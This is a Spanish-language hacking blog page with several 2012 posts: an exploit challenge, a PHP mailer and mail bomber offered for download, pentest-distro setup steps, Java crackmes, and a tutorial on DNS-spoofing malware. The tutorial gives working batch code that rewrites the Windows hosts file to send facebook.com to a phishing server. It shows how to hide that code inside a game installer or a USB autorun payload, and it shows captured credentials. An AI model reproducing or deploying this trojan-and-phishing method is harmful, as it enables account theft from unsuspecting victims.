HD_Breaker Seguridad Informatica

Ethical Hacking And Exploits Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Wargames Challenges and Solutions

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Python App Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Java Development Tools

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Android App Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

martes, 16 de octubre de 2012

Reto Genera Tu Exploit

Hace Tiempo q no codeaba un Reto y este me Parecio Apropiado, toda Persona q se Concidere Pentester Sabe la importancia de este tema. Asi q los Reto a Generar Su PROPIO EXPLOIT!!! para mi pequeña Aplicacion.


Que es un Exploit?



Exploit (del inglés to exploit, explotar o aprovechar) es crear una pieza de software, o una secuencia de comandos con el fin de causar un error o un fallo en alguna aplicación, a fin de causar un comportamiento no deseado o imprevisto en este y lograr ejecutar codigo Arbitrario. Lo Cual el Programa Original no Estaba Destinado a Lograr.

Aca el Link de la Aplicacion:

http://www.filefactory.com/file/cg2sq7ux2jv/n/RetoExploit.rar

Un Pantallazo para que vean q es vulnerable:



No den Pistas, y por favor no Publiquen la Solucion hasta q de por Concluido el Reto.

Espero que les Sea Entretenido a Todos mis Lectores

Offensive Security-Pentest en Entorno Real

Un video De Una Intrusion Real Realizada por la Gente de Offensive Security explicando como lo Lograron Creditos a [Q]rv[O]

http://vimeo.com/22243721

Dejo el Link al Video.

Mailer PHP con soporte HTML

Bueno aca les traigo un pequeño Mailer HTML y Mail Bomber hecho en php (ademas registra las ips que visitan la web), si el servidor smtp esta bien configurado este funcionara a la perfeccion, tambien manda a listas de mails, si de separan los emails por coma.

Source:

http://www.filefactory.com/file/w0w3uyxf3vx/n/HDMailer.zip

Captura:

martes, 4 de septiembre de 2012

BlackBuntu & Backtrack!

Hoy me encontre con un problema muy grande entre mi notebook y mi Backtrack 5 R3.

Este Ultimo Entraba en Conflictos con mi placa de video Intel HD, por lo q cada Tanto Crasheaba Gnome y me cerraba todo Proyecto q no habia guardado, ante este inconveniente decidi volver a mi viejo pero muy confliable Blackbuntu ce 0.3, este aunq con menos Herramientas que Backtrack es un muy confiable y potente Distribucion de Pentest.

Una vez dentro de el, me encontre con la incopatibilidad entre mi placa wifi Broadcom BCM4313 y Blackbuntu y un problema de drivers entre mi touchpad vertical scroll, despues de horas de intentos fallidos encontre una solucion que me parecio muy importante compartir para resolver este fallo, la clave esta en Actualizar el Kernel a la version 3.4 o superior, para lograr esto seguir los siguientes pasos:



1) Ir hacia la zona de Descarga: http://kernel.ubuntu.com/~kernel-ppa/mainline/
2) Entrar en la Carpeta del Kernel deseado en mi caso 3.4.0 (precise)
3) Descargar los siguientes paketes:
                                                        linux-headers___all.deb
                                                        linux-headers___amd64.deb
                                                        linux-image___amd64.deb
4) Instalar los paquetes en el mismo Orden de Descarga del Punto 3.
5) Actualizar Grub2: En un terminal colocar sudo update-grub
6) Reiniciar.

Luego de esto me digne a reiniciar mi pc al iniciar sorpresivamente para mi el Wifi empeso a funcionar a la Perfeccion y ya no tenia problemas con el scroll, ahora sin Problemas en Gnome, sin Problemas con el Wifi y sin Problemas con el TouchPad me voy directo a Solucionar el Problema de las Herramientas Agregando a Blackbuntu los Repositorios Oficiales de Backtrack.

Abrimos el terminal: sudo gedit /etc/apt/sources.list
Copiamos al final de todo:

#####BACKTRACK 5R3 REPOSITORIOS######
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Guardamos y Cerramos.

En el Terminal Colocamos:

sudo wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

Luego:

sudo add-apt-repository ppa:tualatrix/ppa
sudo apt-get update

Despues de Esto Solo queda Abrir Synaptic y instalar las herramientas que deseamos y no posea nuestro Blackbuntu.

jueves, 23 de agosto de 2012

Segundo Crackme Java Keygening

http://www.filefactory.com/file/11qg8hrti5jj/n/CrackMe2.jar

Pequeño Crackme donde tenemos q generar un serial a base de un "Usuario"

martes, 21 de agosto de 2012

Crackme Java

Bastante Facil espero q sea del agrado de los Lectores:

http://www.filefactory.com/file/1dwtw3qemo55/n/CrackMe.jar

martes, 7 de agosto de 2012

Dns Spoof Modificando Archivo hosts con "Malware"


DNS Spoofing Malware


Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash

El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro


Primer Caso:

Ingenieria Social.

Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)


@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit


En mi caso direccionare facebook.com a un sitio Fake (Phishing)

DNSSPOOF.bat:

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit

Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.



Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)

Agregamos los 2 Archivos:



aca la parte importante.


Install Program: Pondremos Packman.exe

Post Intall Command: Pondremos DNSSPOOF.bat



En Show Windows ponemos Hidden

En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User

y lo Guardamos con el Nombre Packman2.exe

En Configure Restart ponemos NO RESTART

Esperamos q Termine la Comprecion

Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)



Ahora ejecutamos para la prueba:



vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.



borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas :)

Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.

Segundo caso:

Ejecutando Archivo desde un PenDrive:

crearemos un archivo autorun.inf que contenga:

[autorun] 

action=Open Files On Folder
icon=USB.ico

shellexecute=Start.vbs

y un Start.vbs que contenga:

set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide

Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive



Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts

Veamos como funciona:

Visitamos facebook.com luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a www.facebook.com (que realmente es un sitio Phishing)
Agregamos de Informacion User: pepe@hotmail.com pass: Owned



y le damos Entrar, nos redirecciona a www.facebook.com (sitio real de facebook)

vamos a nuestro servidor y revisamos el archivo log.txt



Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker